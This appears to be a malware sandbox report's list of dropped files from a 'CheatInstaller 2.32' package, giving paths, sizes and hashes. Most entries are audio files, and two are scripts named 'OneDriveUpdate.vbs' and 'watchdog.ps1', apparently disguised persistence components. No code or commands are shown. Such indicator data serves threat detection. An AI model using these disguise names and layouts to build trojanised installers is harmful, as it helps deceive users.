SHA5120ca46372975ec67c8725b9421c919a24b4310c088584332bf48198a3c8f336b3273716a99fdfd10791f0ba06a0a843b4f5e32384decc4ed8abc8ba67bdc00f97
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_parametric.wav
Filesize125KB
MD537c5ed6c4b4c4f6ef76e0bbfa6780b9a
SHA1d25a798bb75b194936092cbd7a1d308bf6cf01e4
SHA2569c62a3a77a1e1b781765d6a9c1c8cfe1a9805cea0038a92b013fd6d996fe379f
SHA512d78f095f25fc459b456449693ebb8a25ea42e92383423b6deaaf9156499ab9f7ed9d2088e40bdfb947b7e0579f5240ca27fdb8e462e82d87a6e06c357ee40d2d
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_samplernn.wav
Filesize952KB
MD55acab132e4baf883d7f785fabf624952
SHA1dcd1e3fe209cea31e72531e1484b6bb156347308
SHA256e14563629a67f07764f12cfae343d8ddb0309cbda241391d095fbb6109302dd1
SHA512714ed7d425424006fbf248c2e5b95e6525f4abc6e563ecf544fe52f12881af7cf8bd73e790657766e545e753c23f1bd363dde8b6faba675bca147a22cc802c3c
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_specgan.wav
Filesize1.1MB
MD58255f67bfc3ecdc295769095a978febf
SHA129a86937fff81366d2f351e83013ec2085888daf
SHA25682bc4777da977bd63738158e8f62b5360eb817dabee32e8fad12c7abadf54cdd
SHA5125a4be89a24a8707ae06e0cb07fac2badb2b67f4b81e31716aea0cd9ee32901bb75c47ea7a58f0729cd29b84c94de9c02c802f776fb9c308cb2e36b12e45537ea
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_pp.wav
Filesize2.3MB
MD51f17c039e805f0366322565c65c44a96
SHA158f9a9787e412e22bdfdf80ee989cd0ca76b7ec6
SHA256618f46233cb90b39d0da37f37033c0f181ece8583f814ce41c11d1a4d5c49666
SHA5122980f1616f9cc569cc5ecbaa6c71016488867bf0d2c53b51dedd828f5da12921c3582de61f127ca566f5d35c9398af6aa4bc3600845ef569fc8ec5388bdf7dca
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps2.wav
Filesize1.3MB
MD53699a680fb92582c06932c059886e8a5
SHA1a5b6dc92b96ac00a618175c7cbef055c7dbcd2c4
SHA2565af2f1f36d853007dbe6d62a9b9da9735ba1cf3d5116ca48a401655fb8f3b6cf
SHA512a067a77a24ffdd978fa26673d3e1124eee7f7d54e1cb59022442fb517558be6b160c7748c8d807be6911006738b7f741e2759fa488966c36a6272ea5f226fcc5
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps4.wav
Filesize1.2MB
MD5cc441e5812530ddb52d63bfe33152521
SHA178b197f5367ed251b1f1bb55bef8fdc64210c7d1
SHA25673af11ff7ade286f21495eedcdbf536bc77289dea238d95243c5c930fe3be14e
SHA5124f89beba3ffa2f36c24f7c786e26c8e6254041062f897122d7d3d05972a79fd28be82fbc4b273adf036b8bc4e6aad1dcbf08664a017d318cc79da85e31f570b6
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavenet_r9y9.wav
Filesize1.1MB
MD5c5f2abb4c90679145ee886d7f2a2df19
SHA1dc83ac69b8fe03a1a485e620a88001ff98c34bd4
SHA256875c89eee298d0d69e6757942212695c46d3f1e68170bfb52f2e2ba00d0d71cb
SHA5124ccd6d5b7ed7e7364f793a13ffc96cb9425a7913142150b398befec5411e6fb33102960b887ff219e34ec051da0b06a8fc189533c01d52de4deba10304cb4435
-
Filesize
1.1MB
MD595571baa50574628aadb70525035efd6
SHA153dff1840592588b9c52f472ae58fa249bc298e0
SHA256fb9232347afc7b2f56558801907b43c9c04a6efba3c5d3b02b1dc9ea1b2c1c83
SHA51216d0418192d56f3d35b75fd7b92119cdfda36ec27e728bdacc28d09c6ccbbf3f2ec02760415476824350f5c217e6df1ff3d2551d629101a41ce3643734f63ff8
-
Filesize
1.0MB
MD5040963f93a43be7b6050f002fd981578
SHA13c8df5a5c96e449a966d32af6c5835d6de74bb68
SHA2569ec8c24a8bddea004d078f9d1047c7a94fbd5d79c0ab88e84a8cef5d12e0d823
SHA512e14315902550192067ef3fcf95be951bda585306fcc0e54e3c14aad26aed3589147dfc88a4932ffce14dbc54ce58b45496da71eb347bef2dae97e981775e51d5
-
Filesize
439KB
MD513a5675639801f07b9b84df65e987bf4
SHA1dfe7f16f3ad5ad012e0560db6294186e47f5a61d
SHA2569ac4f4be2870852ed62d8b13cad5ac3a5245ba8956fdf9a0f634778a405c93f1
SHA51272cd54bf8ffb17c1d1909e3488206248742de63b6e6bdcf2549e0543b7a5e95902dc841cd38c2d02ccba1e6c3cb1fa32bdc1de1f87930da0c6522d5d82b9936e
-
Filesize
2.3MB
MD55392a5fb1c3d0ce48ee2f6db8c8c157c
SHA1694ad4d5939fa7d468399150a026a3efce6773bf
SHA2561033b1227e5a7814b34221274272b384f0f8ddbe31a600ff070ef1f0c1fee901
SHA5121a0ce0c2c5d4818eb83f38c4c3328eb4aab653a625e0e1fca5338e23f955d4da206c3b0bb3106a89736e69077f75079a3bc54fdc458cebe7389cc8a727e31988
-
Filesize
2.5MB
MD5be2e3041c72229ec79e9423603b942b2
SHA1af6f0bce06505f0a623e04a1e65965e124517dd6
SHA2565650a79a07f02fe153414827ea345edfdd52fd086b61435b030f2b21d86f057e
SHA512d6ade3a99d8132db77fe99869a4e9052d17df17a8b96280b77a8a5f908cbf265073d24f5314d2862d8c3d7f1eae9da8c34d2dc38aac6adfac24945e9b1472ce4
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_birds.wav
Filesize768KB
MD5f36b5ff8446f487897df4dfc256f817d
SHA1d7e152ae0370860d4d6f8b86284762a5f2fc416d
SHA256ab60c5e17efa6938470e9518df24301934252891162a486546798b45ba3bc8a0
SHA512ee727c238d25db53c53a4b19bb22996f2ea4c7abd54de6a728a8892c0ed69753a38ea9410fb8789687fa3799ce2d718fe7ba9ac90dc26b2a48be950074bcd39e
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_timit.wav
Filesize2.3MB
MD5fdc8f9825bac64dbdceff1b1ecfbcf53
SHA1d831b8fc76023af06b13a05811c18611b7c394f3
SHA2569d0e13ff2e27a1e3dd01847e67cf787050764c8b1369d90a60a3a03aa498d00a
SHA512e2216ab419edb6378ca85f1593330a2d68aa6867e4145a93a6a9c4fc0fc80a11f89f6f270ae95549982f0f5f4142512c6b3db7f6fd626971fa26295bccc88b46
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_piano.wav
Filesize2.3MB
MD584cb9d76404e7060326ed19dc51a9a1f
SHA15945326bbc8b4e48afbea13f8c2cf564ffbafbee
SHA256c6ca1f7b252c74ae234c25f37b8eb0122945be66701bf22486c3c27de8d9908b
SHA51295f3fdab34ef9a3c4b797a50c2b00d068da4d309e6aad2b288c140d71a5ef45f182d36a97b99768f50fc226217b7b7ab6d4a4ba3ede529efa801cdbfea575d28
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\OneDriveUpdate.vbs
Filesize13KB
MD5214ee30dbd649af9294f254fc8c33d07
SHA1e81a7486c5c19868abb7d39fc757f686c4124662
SHA256d9747024f7951c01c90b39e18ebe0a490a956625422f165d53f917ae062c4e52
SHA512f1309c116fcaa64b372946686c3a22b0574db717aef91c095fbb70cbeb4125077f363ad9ce0d4a9ec12bc9f61d61df8ef35f5ac20a6a8b9f68b95203b5f93d19
-
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\watchdog.ps1
Filesize11KB
MD5beceb9c4ac840a5ac0b51d8774e63149
SHA1ea375fee5ff404065ba724e877c9a9b01509353b
SHA256d2011dcd715dad784b01709bd0af62c07a91aad758f6e461005178a74c2d3b34
SHA51248e705691523f9804e152433c15142757def6e8dfa72f5dd08169576f7a5073d5e43cce1e148f7df19a566fb863cd377adfcdbeab5308b4cafe9afec9715365d
-
Filesize
2.8MB
MD576eedaf767f7ed00bc8026754e4ab8a4
SHA1f2e5d97586a43b899a5213f83d4b84d8413e541c
SHA25664392c91f00f40ea4251fece7d65b5364a33d1ac0da44d8d5ebe771f60f691a4
SHA512417f95aad5d392a8df930261d19c1166ad8c1ad7787b95f5597c1fd6754927f3019b4c2a3c2c00a99bc794dd095e62767eab1e776a2f54562efe10a72323d7e9
-
Filesize
6.2MB
MD588d6ef66043282511d78477c3457cd05
SHA1dedf2529b0f78f9d7dfe5519d080fe1d11fb0344
SHA25682efcbda4a568f2e898f2c97d3876af8c4c42f2638a339b937b01202bb83fb4a
SHA512506e03b18e11c6133eb4b997bfd017ab5e5ed7a253e0470ee391d8bf5f86196742b57ec03316f1d5699f7a2f556df38468c539a6ff70c52e092bf0c1de61fa2b
-
Filesize
5KB
MD5f0bb4307afbd586f0499f4023213863d
SHA1cd978f445f02aab75b1d89c5e28e348860d8c306
SHA25649a2cd5ce74b5969db3eb785c02fda21f207672b2348c95252b3200d05281129
SHA512a4327e9535d84ad98b4880764a05141170febf1c02d3fb74f71d704185e8176545c15ecfa34e5c8218cc33f4b7f07deb1fe0f2c06c1b400a3798a75016de861c
-
Filesize
9KB
MD5ac330f2a89a6c828059d1f125cb9cb60
SHA1a40b10eae1fba1ea43ff70b3941a165d6d0502f2
SHA2569b2123a554181148e29bbeb66f18da5619b1fd796e4f3de49415748822fef4ec
SHA5120fd4ac721c969496423c336128c8b3751f3752176c891d85e13cbfc226fcfa00751aab1d1d400ee6b70031b6abaa86fb975f45f30b6c0e8789df27904dedcc42
-
Filesize
9KB
MD52620f56f03159589486b831d9b6adc4a
SHA155dfc135be75692bd64c50b429dcd5460e0b0b90
SHA2568438f31c41c8214d92ef0227b0e45eae937e6e5221e410af1ad3735dc9e2ee71
SHA5122915b402391b79635679f415c085646fa3fa6a888b4d00ee9be8aac101760815df6dd390b76192c5d695a116dfd2d297a1e3323b678b184e320049061b974f01
-
Filesize
8KB
MD5ea26bb989e3e2c321a47d499d2682ae1
SHA1a79e8c99186c20fb09f1457b3d183538e1e1b1bb
SHA2564a208c39ac55c440fa336c3463428609db81112512f6551a1331a516a2d1da81
SHA51207f2b43db67b76b463c1770dd6ddb445bbcefcd8f8dfb85e9c28306cf5282272805516dd3166851b66a8358e16632a09a524d6918aae8711d97939beda53137e
-
Filesize
19KB
MD5b7d1f26327bf857bf6ce98ea4fda22b1
SHA1b3f9c0dd62d5a7f533be36664f8e4954cd1f216d
SHA2567ce3f6771b4c0a0c0e662dc51ecb460aae223bb3292eaea6c1c6f1bb805b3786
SHA51291e83b2a3aa885e240f2634d15662954aa0d1104b85ae7bf33948b6bcffcbf763baddb3ecdabd15de53d6eda23d765716891b4dbaaf70168b837480f055e5ab2
-
Filesize
8KB
MD5ccaca741f4002cb8af48d485501ec8e9
SHA14895716a9baf869a5ba2ec1c2d0523b7bc8a6cb3
SHA2560e2099aa021c0a2819f8f80960d729e66f69754675bfe847af8923029a330ec1
SHA51209f005f1e7e8f9f388031c673a593c8afac42298b6f97ff708babfbc403a952692a0bbfbab3ebbd89f8506c2ec7bdb4154f70827680b6dfd390f80054ff2910a
-
Filesize
2KB
MD55b1a12edc7b4e82163e5b39694e5b630
SHA1088d6df18ce940cf01789a27adeaa150f9dc26b7
SHA256206bac7b50b6bd8467ccffcb6d0833c4c8c58a2e82d205f608d4127ddc3402c9
SHA51207846ad52962fc7f07b9e950343f906db5ac09287ced6d4659dae5f99f3fc8ee02916d66557dc2a0a7edbca0a716d8b26c252642558417986532cc28428494cc
-
Filesize
6KB
MD589e2a161df2ef245781707ff93e978bc
SHA1ab2189d5c8dca09cade0586b929f0264c327db32
SHA256b8f747babf732bb64a9cfc60a09b79001c87eb3b37d9704174c0964a49ed6f4a
SHA5120e78e380198330cb143b17490d4540473d359a0198888dfd59ff5b1a94a8637f0e6e8998d2ea6ef83794d41771db449bb4abdc2692872a21ebd7d585652b4115
-
Filesize
8KB
MD55cf177c70e9be2f41adc86ea7e0fc48b
SHA19a597f4d25a0fb4837fa06b9b3792de65fae9551
SHA2569276bfd579b31e71a0f85e8b1085e6f00aafc1428b3c5dee2e765e80c34260a3
SHA512054f52c54dd936a87ad49f1b31fbf248962ad6909686a98e3b76c6772f7ffbb09e6ecb336c3ff6499eadd45746e407c90992fe5e93f44d0e7feee4cab1e071a1
-
Filesize
79KB
MD54a063ecbc6e21f4a145066f6234812bb
SHA16f9bcdbd2312a58dbfa3a92a63405cb09a57e040
SHA256311a847a6612c8a163c43b456a05a205d0275a369e2749b7e5a7de6a64c2b492
SHA512928ef30b1c4a1b86cc1202c1fdffe0ff9fb0abad00b9b3f88bf7ea84c940df915aea285de31a03d9e96a4e88b4fe5768b0574a22b314abaa52ccca3f0ab3445d
-
Filesize
128KB
MD503e02fa0fcbfc84933678cd88582d804
SHA1c91b0e6ca8172a29b101df7532655a130784724c
SHA2567ca5c0e1dc745ab24ef4a1bd0990880a118e548bc7492d65b2b719e21cfdae35
SHA512984c397976547003ceca5057a5371aa5917965701f95995d6653e7822cbe2c16b9f8fa4067cbf433b689d123bd0a8bd3373e32e704d377a751e2645318d74ece
-
Filesize
499KB
MD518db7a45912d1664716efdf6e311f5f1
SHA124a5d1d2addf8095e6f5e4040a2e1c44956bb141
SHA2565ffa59b2cb0995af80de9ce944bb3e2933c42cea0d764c0af137ff842dc7fd0c
SHA5125bc3db53b113d9098170eac6ac1fd2327e6e02f6e5e5e6a5c48e861e1ff683fd2a88928638a0f046a8b89488d6ce1f9eba9952aa34b5ab0858f671b890f250ff
-
Filesize
742KB
MD5a8338e7b3ce49ab7e793952765ac998f
SHA129a2dd67eba553530f84f9e02266474ea678abdd
SHA2566fa584e22fc546b95fa757279ce5569e5540bf2ac28b138adba41877fe0c645d
SHA51285c5095099f7a689e5dd125ad8805b90f59a0e4a930ea791383a596e722d56fa62e4f85c28365c01a6ef2c3b4ddd0e53eb6a70777ad94070b49602993497a64f
-
Filesize
205KB
MD5cac17c92ed0d30bc68ce60905e0af1ea
SHA129589b5816214f537ffb03a4ff9c79f1bd25908b
SHA256e5a59959b68626f622c7a27b2a42468dbfe03a6d956b58b2cdccedf0a632d161
SHA512041aab2032745c2f800ac05ee77073167bf37f81dee56774b498c8f1b60fdcc8f16904e909ed42ef9157dfebeada9998d5c155aa1a10df1ccd608177425acc20
-
Filesize
729KB
MD5165f730f078c7019ea5f2642f8208cda
SHA1370f2e4d1f298b62c1d4743d0e23d2a2d41f950d
SHA25648f509d74ca1afa44b3053e5fb0ddc15d56ca8844e9d150419891c5a38a071a6
SHA51236868c499b28f96853fb77a1dacef2ad2a06ee7b1be41ff2782ac0f90dd247f522dc64951fa72bb77a85d930ddffe28b06eb391e5bf803e396adaa7211c183b6
-
Filesize
837KB
MD52557173f4299722afce46cc3c0616406
SHA1b0343c9a9552be977834e415783b486c4714fe97
SHA256e25369e33c7ef36151769a86d833189b275f85045f35873e9e931547e0a6d591
SHA51224a46359cb8e22534cbd875fe092d096e3280ca4c24936159894ba95832233ee318494a3eabbdf73ae6010e39a1b5897b4488b2771b416b472bb7f60ceddf40e